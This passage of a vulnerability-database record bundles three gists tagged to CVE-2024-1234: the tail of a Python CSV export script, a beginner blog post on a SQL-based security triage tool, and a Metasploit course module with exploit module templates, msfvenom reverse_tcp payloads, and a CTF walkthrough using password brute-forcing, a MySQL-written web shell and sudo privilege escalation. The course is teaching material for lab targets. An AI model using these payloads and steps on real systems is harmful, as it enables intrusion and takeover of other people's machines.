page_size=min(500, args.limit))\n        if total and len(packages) &lt; total:\n            print(f\"\u26a0  Fetched {len(packages)} of {total} total\", file=sys.stderr)\n        print(f\"\u2713 {len(packages)} packages retrieved, exploding CVEs...\", file=sys.stderr)\n        for pkg in packages:\n            all_rows.extend(explode_package_to_rows(pkg))\n\n    if not all_rows:\n        print(\"No results found.\", file=sys.stderr)\n        sys.exit(0)\n\n    # Apply post-filter for severity (can't always push to FQL in package endpoint)\n    if args.severity and not args.cve:\n        before = len(all_rows)\n        all_rows = [r for r in all_rows if r.get(\"severity\", \"\").lower() == args.severity]\n        print(f\"  Severity filter: {before} \u2192 {len(all_rows)} rows\", file=sys.stderr)\n\n    if args.fix_available:\n        before = len(all_rows)\n        all_rows = [r for r in all_rows\n                    if str(r.get(\"fix_available\", \"\")).upper() in (\"TRUE\", \"YES\", \"1\")]\n        print(f\"  Fix-available filter: {before} \u2192 {len(all_rows)} rows\", file=sys.stderr)\n\n    fieldnames = list(all_rows[0].keys())\n    out = open(args.output, \"w\", newline=\"\") if args.output != \"-\" else sys.stdout\n    writer = csv.DictWriter(out, fieldnames=fieldnames, extrasaction=\"ignore\")\n    writer.writeheader()\n    writer.writerows(all_rows)\n    if args.output != \"-\":\n        out.close()\n        print(f\"\u2713 Written to {args.output}  ({len(all_rows)} rows)\", file=sys.stderr)\n    else:\n        print(f\"\\n\u2713 {len(all_rows)} rows written\", file=sys.stderr)\n\n\nif __name__ == \"__main__\":\n    main()\n", "creation_timestamp": "2026-05-11T14:19:10.000000Z"}, {"uuid": "321f8296-1365-4a0c-ac17-e41842de6917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": 
"https://gist.github.com/SamChawla/c8bcbdda8b70e6e1a44bd777f5a4cfae", "content": "  # I Taught SQL to Read My Security Tools \u2014 Here's What Happened\n\n  ### A beginner-friendly story about CoralSentinel, a hackathon proof-of-concept that turns five different security tools into one giant spreadsheet you can ask questions.\n\n  ---\n\n  &gt; **Before we start \u2014 what this is and isn't.** CoralSentinel is a *proof-of-concept* I built\n  &gt; for a one-week hackathon (Pirates of the Coral-bean, WeMakeDevs \u00d7 Coral). It went through\n  &gt; several rounds of writing a plan, building, testing, and throwing things away. It is **not** a\n  &gt; finished product, and I won't pretend it is. It's a demonstration of how far one person can\n  &gt; get on a genuinely hard problem when the right tool does the heavy lifting. That tool is\n  &gt; **Coral**, and this article is mostly a love letter to it.\n  &gt;\n  &gt; If you're new to security tooling or to SQL, don't worry \u2014 I'll explain every term as we go.\n\n  ---\n\n  ## The problem, told as a story\n\n  Imagine you're on a team that builds an app. Like almost every app today, yours has some AI\n  features, so it pulls in popular Python packages \u2014 little bundles of reusable code written by\n  other people. Things like `requests` (for talking to the internet), `pillow` (for handling\n  images), and `django` (a web framework).\n\n  You didn't write those packages. You just `pip install`-ed them and moved on. **And that's\n  where the danger hides.**\n\n  Every so often, someone discovers a security hole in one of these packages. When that happens,\n  it gets a public ID \u2014 a **CVE** (Common Vulnerabilities and Exposures), which is just a unique\n  name for a known bug, like `CVE-2024-1234`. There's a free public database called **OSV** that\n  lists all of these.\n\n  Now the trouble starts. One morning your build breaks. 
Your **container registry** (the place\n  that stores the packaged-up version of your app, ready to ship) refuses to accept your new\n  build because it spotted a CVE. Or your **CI pipeline** (the automated system that tests and\n  ships your code) turns red. Someone has to figure out, fast:\n\n  &gt; **\"Is this security hole actually hurting our running app right now \u2014 and is anyone already\n  &gt; fixing it?\"**\n\n  That sounds like a five-minute question. In real life, it's 30 to 60 minutes of clicking\n  between five different tools, each of which knows only its own little corner:\n\n  - **OSV** \u2014 *What is this CVE? Which package versions are affected?*\n  - **GitHub** \u2014 *Has anyone opened a pull request to fix it?* (A \"pull request,\" or PR, is a\n    proposed code change.)\n  - **Sentry** \u2014 *Is our live app actually throwing errors related to this?* (Sentry is a tool\n    that catches and reports crashes in running apps.)\n  - **Jira** \u2014 *Is there a ticket for this? Who owns it?* (Jira is where teams track tasks.)\n  - **Grafana** \u2014 *Do our infrastructure dashboards show anything weird?*\n\n  You become a human copy-paste machine, stitching five tools together in your head. There's\n  even a word for this in the database world: you're doing a **JOIN** \u2014 manually matching up\n  related information from different sources. Computers are *really* good at JOINs. Humans are\n  slow and make mistakes.\n\n  So I wondered: what if I could make the computer do the JOIN?\n\n  ---\n\n  ## The \"aha\": what if every tool were just a table?\n\n  If you've ever used a spreadsheet, you already understand a **database table**: rows and\n  columns. And **SQL** (Structured Query Language) is just the most common way to ask questions\n  of tables. 
A SQL question \u2014 called a **query** \u2014 reads almost like English:\n\n  ```sql\n  SELECT name, severity\n  FROM vulnerabilities\n  WHERE severity = 'CRITICAL'\n  ```\n\n  That says: *\"Give me the name and severity from the vulnerabilities table, but only the\n  critical ones.\"* That's it. That's SQL.\n\n  The dream: what if OSV, GitHub, Sentry, Jira, and Grafana were all just **tables** I could\n  query with SQL \u2014 even *join together* in a single question?\n\n  Here's the catch, and why this is normally hard. Each of those five tools speaks its own\n  language over the internet (an **API**, or Application Programming Interface \u2014 the doorway\n  other programs use to talk to a service). Each API has:\n\n  - its own way of proving who you are (**authentication**),\n  - its own way of handing back results a page at a time (**pagination**),\n  - its own limits on how often you're allowed to ask (**rate limits**).\n\n  Normally, to talk to five APIs, you'd write five mini-programs, handle five logins, five\n  paging systems, five sets of limits, and *then* write the code to match the data up. That's a\n  solid week of plumbing before you answer a single question. For a one-person hackathon project,\n  that's a non-starter.\n\n  This is exactly the wall that stops most people. And this is where Coral comes in.\n\n  ---\n\n  ## Enter Coral: the universal translator\n\n  **Coral** is a tool that turns external services into SQL tables. You connect a \"source\" (like\n  GitHub or Sentry) once, and from then on you just write SQL. Coral handles the logins, the\n  paging, and the rate limits *below deck* \u2014 you never see them.\n\n  So those five separate tools? With Coral, they become five tables I can query and **JOIN** in\n  one breath. The week of plumbing... evaporates.\n\n  Connecting a source is genuinely a one-liner. 
Here's how CoralSentinel adds the OSV\n  vulnerability database:\n\n  ```bash\n  coral source add --file ./sources/osv/osv.yaml\n  ```\n\n  And GitHub, Jira, Sentry, and Grafana are \"bundled\" \u2014 Coral already knows how to talk to them,\n  so you just add them and provide your credentials.\n\n  &gt; **A small bounty side-quest.** OSV wasn't one of Coral's built-in sources, so I wrote a\n  &gt; \"source spec\" for it \u2014 a `osv.yaml` file that teaches Coral how to turn the OSV API into SQL\n  &gt; tables. That file is reusable by anyone, and it's my little contribution back to the\n  &gt; community. You don't need to understand its internals to follow this article; just know that\n  &gt; teaching Coral a *new* tool is a config file, not a codebase.\n\n  ---\n\n  ## The one query that replaces an hour of clicking\n\n  Here's the heart of the whole project. This single SQL query asks all three of the most\n  important questions at once \u2014 *Is there a known vulnerability? Is anyone tracking it in Jira?\n  Is the live app throwing errors about it in Sentry?* \u2014 for the `pillow` image package:\n\n  ```sql\n  SELECT\n      osv.id AS cve,                 -- the vulnerability's public ID\n      osv.summary,                   -- a human description of it\n      osv.severity,                  -- how bad it is\n      j.key AS jira_ticket,          -- the Jira ticket, if one exists\n      j.status_name AS jira_status,  -- e.g. 
\"In Progress\"\n      CASE WHEN j.key IS NULL THEN 'UNTRACKED'\n          ELSE COALESCE(j.status_name, 'Tracked') END AS tracking_status,\n      COALESCE(se.count, 0) AS error_count,  -- how many live errors\n      se.level AS error_level\n  FROM osv.search_vulnerabilities(\n      package =&gt; 'pillow',\n      ecosystem =&gt; 'PyPI'\n  ) osv\n  LEFT JOIN jira.issues j\n      ON j.summary LIKE CONCAT('%', osv.id, '%')\n      OR j.summary LIKE CONCAT('%', 'pillow', '%')\n  LEFT JOIN sentry.issues se\n      ON se.level IN ('fatal', 'error')\n      AND CAST(se.last_seen AS TIMESTAMP) &gt;= NOW() - INTERVAL '30' DAY\n      AND se.title LIKE CONCAT('%', 'pillow', '%')\n  ORDER BY osv.published DESC\n  LIMIT 5;\n  ```\n\n  Don't be intimidated \u2014 let's read it in plain English, top to bottom:\n\n  1. **`SELECT ...`** \u2014 \"Here are the columns I want back.\" (The CVE, its summary, the Jira\n    ticket, the error count, and so on.)\n  2. **`FROM osv.search_vulnerabilities(package =&gt; 'pillow', ...)`** \u2014 \"Start with all known\n    vulnerabilities for the `pillow` package, from PyPI (Python's package store).\"\n  3. **`LEFT JOIN jira.issues ...`** \u2014 \"For each vulnerability, also try to find a matching Jira\n    ticket.\"\n  4. **`LEFT JOIN sentry.issues ...`** \u2014 \"And also try to find matching live errors from the last\n    30 days in Sentry.\"\n\n  That `LEFT JOIN` is doing the work a human would otherwise do by tabbing between browser\n  windows. **Three tools, one question, a couple of seconds.**\n\n  ### Two beginner-friendly tricks that make it actually work\n\n  When I first tried this, it returned nothing. Here's why \u2014 and the two lessons that made it\n  click. These are worth knowing even if you only ever write SQL casually:\n\n  **1. Match *loosely*, not exactly.** A Jira ticket titled *\"Upgrade pillow to fix\n  CVE-2024-1234\"* will never be *exactly equal* to the string `CVE-2024-1234`. 
If you demand an\n  exact match, you get nothing. So instead of `=`, the query uses `LIKE` with `%` wildcards,\n  which means \"contains this somewhere.\" `j.summary LIKE '%pillow%'` means \"any Jira ticket whose\n  title contains the word pillow.\" Real-world data is messy; loose matching is how you cope.\n\n  **2. Match on *time windows*, not exact timestamps.** A live error and a vulnerability won't\n  happen at the exact same millisecond. So rather than demanding equal timestamps, the query\n  asks for errors \"in the last 30 days\" (`NOW() - INTERVAL '30' DAY`). Time *ranges*, not exact\n  moments.\n\n  These two ideas \u2014 **loose text matching** and **time windows** \u2014 are the difference between a\n  query that works in a tidy demo and one that works on real, messy data.\n\n  ---\n\n  ## The moment it all pays off\n\n  So you run a scan across a handful of your AI-stack packages, and CoralSentinel sorts every\n  vulnerability into one of three buckets. (The colored dots are exactly what the dashboard\n  shows.)\n\n  - \ud83d\udd34 **Untracked** \u2014 There are CVEs in `requests` and `pillow`, but **no Jira ticket exists for\n    them**. Nobody on the team even knows. These slipped through the cracks. These are packages\n    in nearly *every* AI app, by the way.\n  - \ud83d\udd34 **Actively breaking** \u2014 Here's the one that gives me chills. The `pillow` vulnerability\n    isn't just theoretical: it lines up with **12 \"fatal\" errors in Sentry in the same time\n    window.** That's not a someday-problem on a backlog \u2014 that's *your image feature crashing for\n    real users right now.* And you could **only** see that because OSV (the vulnerability) was\n    joined to Sentry (the live crashes). Neither tool knows that on its own.\n  - \ud83d\udfe2 **Already handled** \u2014 The `django` vulnerability already has a Jira ticket marked \"In\n    Progress.\" Someone's on it. 
So the tool stays quiet about it \u2014 no nagging, no \"alert\n    fatigue.\"\n\n  That middle one \u2014 connecting *\"there's a known bug\"* to *\"and it's crashing the app right\n  now\"* \u2014 is the insight that's basically impossible without cross-tool SQL. That's the whole\n  pitch in one screenshot.\n\n  ---\n\n  ## From \"here's the problem\" to \"here's the fix\" \u2014 safely\n\n  Spotting the problem is only half the job. CoralSentinel then acts like a careful assistant. I\n  call the overall flow **DETECT \u2192 RECOMMEND \u2192 ACT**:\n\n  | Step | What happens | In plain words |\n  |---|---|---|\n  | **DETECT** | Cross-source SQL reads all five tools | \"Here's what I found.\" |\n  | **RECOMMEND** | The assistant suggests a to-do list | \"Here's what I'd do about it.\" |\n  | **ACT** | It does the tasks \u2014 *only after you approve* | \"Want me to? Click yes.\" |\n\n  For our example, the RECOMMEND step produces a tidy, ordered list like:\n\n  1. Open a Jira ticket for the untracked `requests` vulnerability.\n  2. Open a Jira ticket for the `pillow` one \u2014 **flagged urgent** (it's actively crashing things).\n  3. Draft a GitHub pull request to upgrade `pillow` from version 9.0.0 to 10.3.0.\n  4. Add a note (an \"annotation\") to the Grafana dashboard timeline.\n  5. Write up a short security report.\n\n  ### The safety rule I'm most proud of\n\n  Here's the part that matters if you're nervous about letting software touch your systems:\n\n  &gt; **Coral can only ever *read*. It physically cannot change anything.**\n\n  Reading data and changing data are kept in completely separate parts of the program. Nothing\n  gets written to Jira, GitHub, or Grafana until **a human clicks \"Approve.\"** No runaway robot\n  making changes on its own. You stay in control; the tool just removes the busywork. 
The result:\n  about 30 minutes of manual detective work collapses into roughly 30 seconds \u2014 without handing\n  over the keys.\n\n  ---\n\n  ## \"Wait, where's the AI?\"\n\n  Good \u2014 you noticed I've barely mentioned AI, even though this is an AI-security tool. That's on\n  purpose. The clever part isn't the AI; it's the SQL. But there *is* a friendly AI layer on top,\n  and it does two nice things:\n\n  **1. It writes the SQL for you.** You can type a plain-English question like *\"Which packages\n  have untracked critical CVEs?\"* and the AI (an **LLM**, or Large Language Model \u2014 the same kind\n  of tech behind chatbots) turns it into a proper Coral SQL query, runs it, and explains the\n  results. Importantly, **it then shows you the exact SQL it wrote.** No mystery, no black box \u2014\n  you can read precisely what it asked the database.\n\n  **2. You can bring your own AI.** I didn't lock the project to one AI company. It works with\n  four interchangeable options, so you can use whatever you already have access to:\n\n  | AI provider | How you'd use it |\n  |---|---|\n  | **Cursor** | Use your existing Cursor subscription via a small local helper \u2014 no extra key needed |\n  | **EURI** | A simple API key |\n  | **Grok** (from xAI) | A simple API key |\n  | **Anthropic** (Claude) | A simple API key |\n\n  You set one setting (`LLM_PROVIDER`), or just leave it on `auto` and it picks the first one\n  you've configured. Under the hood it's one tidy function that all four plug into.\n\n  And there's a guardrail baked into the AI's instructions: it's **only ever allowed to write\n  read-only queries.** The code literally rejects any AI-generated query that tries to change\n  data \u2014 it checks for forbidden words like `INSERT`, `UPDATE`, and `DELETE` and refuses to run\n  them. 
Belt *and* suspenders.\n\n  ---\n\n  ## A few grown-up touches\n\n  Because I wanted this to feel like a real tool and not a toy script, I added a couple of things\n  beginners might find interesting:\n\n  - **A login screen with organizations.** When you sign up, you create an \"organization\" (think:\n    your team's workspace) and become its first member. Passwords are stored scrambled (a process\n    called **hashing**, so even I can't read them), and you stay logged in via a secure browser\n    cookie. All built with Python's standard toolkit \u2014 no heavy extra libraries.\n  - **A memory for recent questions (caching).** If the tool just asked Coral something, it\n    remembers the answer for a short while instead of pestering the five APIs again. So flipping\n    between tabs feels instant. (In the code, this is a small dictionary that stores results with\n    a timestamp \u2014 simple, but effective.)\n  - **Two ways to use it.** There's a slick dark-themed web dashboard *and* a command-line version\n    for terminal fans. Both run the exact same SQL underneath.\n\n  Here's the command-line version, start to finish:\n\n  ```bash\n  # 1. DETECT \u2014 scan some packages for trouble\n  coralsentinel scan --packages django,requests,pillow,celery\n\n  # 2. RECOMMEND \u2014 see the suggested to-do list\n  coralsentinel recommend --packages django,requests,pillow,celery\n\n  # 3. 
ACT \u2014 approve everything (only now does anything get written)\n  coralsentinel act --approve-all\n  ```\n\n  ---\n\n  ## Try it yourself\n\n  If you want to poke at it, here's the short version:\n\n  ```bash\n  git clone  coral-sentinel\n  cd coral-sentinel\n  pip install -e .\n\n  # Teach Coral about the OSV vulnerability database (it's a public API, no login needed)\n  coral source add --file ./sources/osv/osv.yaml\n\n  # Start the web dashboard\n  uvicorn devsecops_coral.api:app --reload --port 8000\n  cd frontend &amp;&amp; npm install &amp;&amp; npm run dev   # then open http://localhost:5173\n  ```\n\n  &gt; Repo: `` \u00b7 Live demo: ``\n\n  ---\n\n  ## What I actually learned\n\n  If you take one thing from this article, let it be this:\n\n  Teams building AI products don't really have a vulnerability **detection** problem anymore \u2014\n  scanners and registries are good at shouting \"this package is risky!\" What they have is a\n  **triage** problem: *out of all these warnings, which one is actually on fire right now, and\n  who owns putting it out?*\n\n  Answering that means connecting tools that were never designed to talk to each other. And the\n  reason I \u2014 one person, in a hackathon week \u2014 could build a five-tool correlation engine, an\n  approval-gated assistant, a login system, *and* support for four different AI providers, is\n  **not** that I'm especially fast. It's that Coral deleted the part that's normally the hard\n  part. Once your messy, far-flung tools all become tidy SQL tables, the work stops being\n  *plumbing* and starts being the *interesting question*.\n\n  That's the real lesson, and it's a beginner-friendly one: **the right tool doesn't just make\n  hard work easier \u2014 it makes a different kind of work possible.** CoralSentinel is an 80%\n  proof-of-concept of that idea. It's rough in places, it's unfinished on purpose, and I think\n  it's all the more convincing for it.\n\n  Thanks for reading. 
If you're just getting into security tooling or SQL, I hope this made the\n  whole thing feel a little less mysterious. \ud83e\udeb8\n\n  ---\n\n  *Built for Pirates of the Coral-bean (WeMakeDevs \u00d7 Coral), Track 1 \u2014 Enterprise Agent.*\n\n  \n", "creation_timestamp": "2026-05-30T07:39:07.000000Z"}, {"uuid": "a264d72b-0bc2-4dc5-b3df-151451e88804", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/riskiidice/d7687b881b245df5bc96147fc1e6b01c", "content": "# Module 6: Real-World Exploitation &amp; CTF Scenarios\n\n---\n\n## Lesson 26: Exploit Development with MSF (CVE-Focused)\n\n### Learning Objectives\n- Understand the MSF exploit module structure as a foundation for exploit development\n- Use `searchsploit` to find public exploits and convert them to MSF format\n- Analyze CVE details and map them to MSF modules\n- Write a basic MSF exploit module from scratch\n- Understand egghunters, SEH overwrites, and ROP chains\n\n---\n\n### Theory/Explanation\n\n#### Anatomy of an MSF Exploit Module\n\nEvery MSF exploit module is a Ruby class inheriting from an MSF exploit mixin:\n\n```ruby\n# modules/exploits/windows/smb/custom_cve.rb\nrequire 'msf/core'\n\nclass MetasploitModule &lt; Msf::Exploit::Remote\n  Rank = NormalRanking  # or GreatRanking, ExcellentRanking, etc.\n\n  def initialize(info = {})\n    super(update_info(info,\n      'Name'           =&gt; 'Custom CVE-2024-XXXX SMB Exploit',\n      'Description'    =&gt; %q{\n        This module exploits CVE-XXXX-XXXX in the SMB protocol.\n        A remote code execution vulnerability exists due to\n        improper handling of specially crafted SMB packets.\n      },\n      'Author'         =&gt; ['Your Name '],\n      'License'         =&gt; MSF_LICENSE,\n      'References'     =&gt;\n        [\n          ['CVE', '2024-XXXX'],\n          ['URL', 
'https://example.com/advisory'],\n          ['EDB', '12345']\n        ],\n      'Platform'       =&gt; ['win'],\n      'Arch'           =&gt; [ARCH_X64],\n      'Targets'        =&gt;\n        [\n          ['Windows Server 2019', {\n            'Payload' =&gt; 'windows/x64/meterpreter/reverse_tcp',\n            'RPORT' =&gt; 445\n          }]\n        ],\n      'DefaultTarget'  =&gt; 0,\n      'DisclosureDate' =&gt; '2024-01-15'\n    ))\n\n    register_options([\n      Opt::RHOST(),\n      Opt::RPORT(445),\n      OptString.new('NAME', [true, 'SMB share name', 'C$'])\n    ])\n  end\n\n  def exploit\n    print_status(\"Connecting to target...\")\n    connect\n    print_status(\"Sending malicious payload...\")\n    sock.put(payload.encoded)\n    handler\n  ensure\n    disconnect\n  end\nend\n```\n\n#### Exploit Ranking System\n\nMSF assigns ranks to modules based on reliability:\n\n| Rank | Meaning |\n|------|---------|\n| `ManualRanking` | Don't use automatically |\n| `LowRanking` | Unreliable, may crash |\n| `AverageRanking` | Normal, may crash sometimes |\n| `NormalRanking` | Standard exploit |\n| `GoodRanking` | Reliable, works consistently |\n| `GreatRanking` | Very reliable, has auto-targeting |\n| `ExcellentRanking` | Best, won't crash, auto-detects |\n\n#### Using searchsploit\n\n```bash\n# Search for exploits\nsearchsploit smb 8.1\nsearchsploit -t windows smb ms17\nsearchsploit CVE-2024-1234\n\n# Show full path\nsearchsploit -p 50644\n\n# Copy exploit to working directory\nsearchsploit -m 50644  # mirror (copy)\n\n# Update exploit database\nsearchsploit -u\n```\n\n#### Writing a Simple Buffer Overflow MSF Module\n\n```ruby\n# modules/exploits/windows/custom/bof.rb\nrequire 'msf/core'\n\nclass MetasploitModule &lt; Msf::Exploit::Remote\n  Rank = GoodRanking\n\n  def initialize(info = {})\n    super(update_info(info,\n      'Name'            =&gt; 'Custom Buffer Overflow',\n      'Description'     =&gt; %q{\n        Stack-based buffer overflow in vulnerable 
service.\n        Sending 2000 bytes overwrites EIP.\n      },\n      'Author'          =&gt; ['Attacker'],\n      'References'      =&gt; [['EDB', '12345']],\n      'Platform'        =&gt; ['win'],\n      'Arch'            =&gt; [ARCH_X86],\n      'Targets'         =&gt;\n        [\n          ['Windows XP SP3', {\n            'Payload' =&gt; 'windows/meterpreter/reverse_tcp',\n            'Offset' =&gt; 2000,\n            'Ret' =&gt; 0x41414141  # JMP ESP address\n          }]\n        ],\n      'DefaultTarget'   =&gt; 0,\n      'DisclosureDate'  =&gt; '2024-01-01'\n    ))\n\n    register_options([\n      Opt::RHOST(),\n      Opt::RPORT(9999)\n    ])\n  end\n\n  def exploit\n    connect\n\n    # Build overflow buffer\n    buffer = rand_text(target['Offset'])\n    buffer += [target['Ret']].pack('V')  # overwrite EIP with JMP ESP\n    buffer += make_nops(16)\n    buffer += payload.encoded\n\n    print_status(\"Sending #{buffer.length} byte buffer...\")\n    sock.put(buffer)\n\n    handler\n    disconnect\n  end\nend\n```\n\n#### Egghunter Shellcode\n\nWhen you have limited space for shellcode, use an egghunter \u2014 a small (~60 byte) stub that searches memory for your full payload (marked with a tag):\n\n```bash\n# Generate egghunter shellcode\nmsfvenom -p linux/x64/egghunter LHOST=10.0.0.5 LPORT=4444 -f c\n\n# Use in your exploit: first stage is egghunter (small)\n# Second stage is your full payload tagged with \"w00tw00t\"\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -b '\\x00' -f c\n# Tag the payload: prepend \"w00tw00t\" to it\n```\n\n---\n\n### Exercise 26.1\n\n**Task**:\n\n1. Use `searchsploit` to find exploits related to `samba` and ` EternalBlue`\n2. Identify a specific EDB-ID exploit and mirror it to `/tmp/exploits/`\n3. Analyze the mirrored exploit to identify: target platform, required options, and payload type\n4. Create a minimal MSF module skeleton for a fictional CVE in `/tmp/exploits/custom_module.rb`\n5. 
Show how to load the custom module in msfconsole\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Search for Samba exploits\nsearchsploit samba | head -20\n# Results:\n# EDB-ID    Title\n# 42030    Samba 3.5.0 - Lock Denial of Service\n# 33598    Samba 3.6.4 - Pool Memory Exhaustion\n# 42015    Samba 4.6.4 Remote Code Execution\n\nsearchsploit EternalBlue\n# EDB-ID: 42030 (depends on version)\n\n# 2. Mirror the exploit\nmkdir -p /tmp/exploits\nsearchsploit -m 42015\n# Copies: /usr/share/exploitdb/exploits/linux/remote/42015.rb -&gt; /tmp/exploits/\n\n# 3. Analyze the exploit\nhead -100 /tmp/exploits/42015.rb\n# Shows:\n# - Target: Samba 4.6.4\n# - Platform: linux\n# - Arch: x86/x64\n# - Payload: 'linux/x86/meterpreter/reverse_tcp' or similar\n# - Required: RHOST, RPORT (445), SMB versions\n\n# 4. Create custom module skeleton\ncat &gt; /tmp/exploits/custom_module.rb &lt;&lt; 'EOF'\nrequire 'msf/core'\n\nclass MetasploitModule &lt; Msf::Exploit::Remote\n  Rank = GoodRanking\n\n  def initialize(info = {})\n    super(update_info(info,\n      'Name'           =&gt; 'Custom Application CVE-2024-0001 RCE',\n      'Description'    =&gt; %q{\n        This module exploits CVE-2024-0001 in CustomApp v1.0.\n        A remote code execution vulnerability exists due to\n        improper input validation in the authentication handler.\n      },\n      'Author'         =&gt; ['Attacker '],\n      'License'         =&gt; MSF_LICENSE,\n      'References'     =&gt;\n        [\n          ['CVE', '2024-0001'],\n          ['URL', 'https://example.com/advisory']\n        ],\n      'Platform'       =&gt; ['linux'],\n      'Arch'           =&gt; [ARCH_X64],\n      'Targets'        =&gt;\n        [\n          ['CustomApp 1.0', {\n            'Payload' =&gt; 'linux/x64/meterpreter/reverse_tcp',\n            'RPORT' =&gt; 8080\n          }]\n        ],\n      'DefaultTarget'  =&gt; 0,\n      'DisclosureDate' =&gt; '2024-01-15'\n    ))\n\n    register_options([\n     
 Opt::RHOST(),\n      Opt::RPORT(8080)\n    ])\n  end\n\n  def exploit\n    connect\n    print_status(\"Sending exploit...\")\n    sock.put(payload.encoded)\n    handler\n  ensure\n    disconnect\n  end\nend\nEOF\n\n# 5. Load custom module in msfconsole\n# Option A: Copy to MSF module directory\ncp /tmp/exploits/custom_module.rb /usr/share/metasploit-framework/modules/exploits/custom/\nmsfconsole -q\nmsf6 &gt; use exploit/custom/custom_module\n\n# Option B: Use loadpath\nmsfconsole -q\nmsf6 &gt; loadpath /tmp/exploits\nmsf6 &gt; use exploit/custom/custom_module\n```\n\n\n\n---\n\n## Lesson 27: CTF Walkthrough \u2014 Boot2Root with MSF\n\n### Learning Objectives\n- Apply MSF systematically in a CTF boot2root challenge\n- Combine port scanning, vulnerability identification, and exploitation\n- Use Meterpreter for privilege escalation\n- Capture the flags (flag.txt) at each stage\n- Document methodology for writeups\n\n---\n\n### Theory/Explanation\n\n#### CTF Methodology with MSF\n\n```\nPhase 1: Reconnaissance\n  - db_nmap -sV -sC -oA scan\n  - Import into MSF database\n  - Analyze services\n\nPhase 2: Vulnerability Discovery\n  - searchsploit on discovered services\n  - Use MSF auxiliary scanners\n  - Manual inspection\n\nPhase 3: Exploitation\n  - Select and configure MSF exploit\n  - Generate appropriate payload\n  - Establish session\n\nPhase 4: Post-Exploitation\n  - Enumerate filesystem\n  - Find user.txt (user flag)\n  - Enumerate for privilege escalation vector\n\nPhase 5: Privilege Escalation\n  - Exploit kernel/system misconfiguration\n  - Get root.txt (root flag)\n```\n\n#### Example CTF Scenario: \"VulnNet\"\n\n```bash\n# Phase 1: Network scan\nmsfconsole -q\nmsf6 &gt; db_nmap -sV -sC -p- 192.168.56.100 -oA /tmp/vulnnet_scan\n\n# Import results\nmsf6 &gt; hosts\nHost                    OS  Purpose\n192.168.56.100          Linux  Web server, SSH\n\nmsf6 &gt; services\nPORT     STATE  SERVICE  VERSION\n22       open   ssh      OpenSSH 7.4\n80       open   
http     Apache 2.4.6\n3306     open   mysql    MySQL 5.5.60\n\n# Phase 2: Web enumeration\nmsf6 &gt; use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) &gt; set RHOSTS 192.168.56.100\nmsf6 auxiliary(scanner/http/dir_scanner) &gt; run\n# Found: /admin (redirects to login)\n# Found: /phpmyadmin (database admin)\n\n# Phase 3: Exploitation\n# Try default MySQL credentials\nmsf6 &gt; use auxiliary/scanner/mysql/mysql_login\nmsf6 auxiliary(scanner/mysql/mysql_login) &gt; set RHOSTS 192.168.56.100\nmsf6 auxiliary(scanner/mysql/mysql_login) &gt; set USERNAME root\nmsf6 auxiliary(scanner/mysql/mysql_login) &gt; set PASS_FILE /usr/share/wordlists/rockyou.txt\nmsf6 auxiliary(scanner/mysql/mysql_login) &gt; run\n# Result: root:root123\n\n# Phase 4: Get user flag via web shell\n# Since we have MySQL access, try into/outfile to write web shell\nmsf6 &gt; use auxiliary/admin/mysql/mysql_sql\nmsf6 auxiliary(admin/mysql/mysql_sql) &gt; set RHOSTS 192.168.56.100\nmsf6 auxiliary(admin/mysql/mysql_sql) &gt; set SQL \"SELECT '' INTO OUTFILE '/var/www/html/shell.php'\"\nmsf6 auxiliary(admin/mysql/mysql_sql) &gt; run\n\n# Now access web shell\ncurl http://192.168.56.100/shell.php?cmd=whoami\n# www-data\n\n# Get meterpreter by generating a PHP payload\nmsfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f raw &gt; /tmp/shell.php\n# Upload via the web shell and access it\n\n# Phase 5: Privilege escalation\nmeterpreter &gt; shell\n$ python3 -c 'import os; os.system(\"/bin/bash\")'\n$ cd /home\n$ ls\nvictim\n$ cat /home/victim/user.txt\nFLAG{user_flag_here}\n\n# Find privilege escalation vector\n$ sudo -l\nUser www-data may run the following commands:\n    (ALL) NOPASSWD: /usr/bin/python3\n\n$ sudo python3 -c 'import os; os.system(\"/bin/bash\")'\n# root shell\n# cat /root/root.txt\nFLAG{root_flag_here}\n```\n\n---\n\n### Exercise 27.1\n\n**Task**: Walk through a complete CTF scenario (use your own lab VM or practice box):\n\n1. 
Run a comprehensive nmap scan via MSF db_nmap\n2. Import the scan results and list all hosts/services\n3. Use `searchsploit` on discovered services\n4. Exploit a vulnerability to get a shell\n5. Get the user flag\n6. Enumerate for privilege escalation\n7. Escalate to root and get the root flag\n8. Export the session log for a writeup\n\n```bash\n# TODO: Execute all steps on your practice VM\n```\n\n\n\nSolution\n\n```bash\n# Setup: Assuming target IP is 192.168.56.101\n# (This exercise is meant to be done on your own lab VM)\n\n# 1. Comprehensive scan\nmsfconsole -q\nmsf6 &gt; db_nmap -sV -sC -A -p- -oA /tmp/ctf_scan 192.168.56.101\n\n# 2. Import and list\nmsf6 &gt; hosts\nmsf6 &gt; services\n# Results show:\n# PORT     STATE  SERVICE  VERSION\n# 21       open   ftp      vsFTPd 3.0.3\n# 22       open   ssh      OpenSSH 7.4 (protocol 2.0)\n# 80       open   http     Apache 2.4.6 (PHP 7.0.33)\n# 3306     open   mysql    MariaDB 5.5.60\n\n# 3. Searchsploit\nsearchsploit vsftpd 3.0.3\n# EDB: 49759 - vsftpd 3.0.3 - Denial of Service (doesn't give shell)\n\nsearchsploit OpenSSH 7.4\n# No critical RCE for 7.4\n\nsearchsploit Apache 2.4.6\n# Find: Apache 2.4.6 - PHP 7.0.33 has exploit (CVE-2018-xxxx for example)\n\n# 4. Exploit\nmsf6 &gt; use exploit/unix/webapp/phpmyadmin_lfi_rce\n# (Use whatever exploit matches your target)\n\n# 5. Get user flag\nmeterpreter &gt; shell\n$ find / -name \"user.txt\" 2&gt;/dev/null\n/home/ubuntu/user.txt\n$ cat /home/ubuntu/user.txt\nFLAG{ctf_user_flag_abc123}\n\n# 6. Enumerate for privesc\n$ sudo -l\n(ubuntu) NOPASSWD: /bin/bash\n\n# Actually check for privesc via enumeration 